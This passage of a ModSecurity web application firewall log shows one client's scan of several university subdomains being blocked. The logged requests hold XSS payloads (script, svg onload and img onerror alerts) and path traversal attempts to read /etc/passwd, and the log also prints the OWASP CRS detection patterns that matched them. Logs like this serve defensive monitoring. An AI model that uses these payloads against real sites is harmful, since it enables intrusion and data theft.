"PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16PcCo-f0AAApbUhMAAAAh"]
[Tue Aug 29 11:55:25.988598 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:fccc'\\x5c\\x5c\\x22><svg/onload: alert(/xss/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqTvrEAAAAa"]
[Tue Aug 29 11:55:26.083374 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PsCo-f0AAAqeFWIAAAAx"]
[Tue Aug 29 11:55:26.560365 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PsCo-f0AAApbUhUAAAAh"]
[Tue Aug 29 11:55:26.616802 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqsV7YAAAAB"]
[Tue Aug 29 11:55:26.644925 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PsCo-f0AAAqsV7cAAAAB"]
[Tue Aug 29 11:55:26.655454 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:fccc'\\x5c\\x5c\\x22><svg/onload: alert(/xss/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PsCo-f0AAAoz8GAAAAAS"]
[Tue Aug 29 11:55:26.700646 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAolKpAAAAAe"]
[Tue Aug 29 11:55:26.701067 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqeFWgAAAAx"]
[Tue Aug 29 11:55:26.744179 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqsV7oAAAAB"]
[Tue Aug 29 11:55:26.754554 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAolKpIAAAAe"]
[Tue Aug 29 11:55:27.901443 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search/"] [unique_id "ZO16P8Co-f0AAAqY6D8AAAAr"]
[Tue Aug 29 11:55:27.904016 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16P8Co-f0AAAqeFW0AAAAx"]
[Tue Aug 29 11:55:28.541969 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAolKpYAAAAe"]
[Tue Aug 29 11:55:28.568021 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAApXgp0AAAAU"]
[Tue Aug 29 11:55:28.571900 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqTvrsAAAAa"]
[Tue Aug 29 11:55:28.621287 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAolKpgAAAAe"]
[Tue Aug 29 11:55:28.624876 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAqSwt0AAAAN"]
[Tue Aug 29 11:55:29.642000 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QcCo-f0AAAoz8GgAAAAS"]
[Tue Aug 29 11:55:29.791162 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqTvsEAAAAa"]
[Tue Aug 29 11:55:29.794828 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqqtgYAAAAA"]
[Tue Aug 29 11:55:29.872633 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqTvsQAAAAa"]
[Tue Aug 29 11:55:29.890627 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqY6EgAAAAr"]
[Tue Aug 29 11:55:29.895320 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqTvsUAAAAa"]
[Tue Aug 29 11:55:30.527822 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqY6EkAAAAr"]
[Tue Aug 29 11:55:30.528058 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAApXgrQAAAAU"]
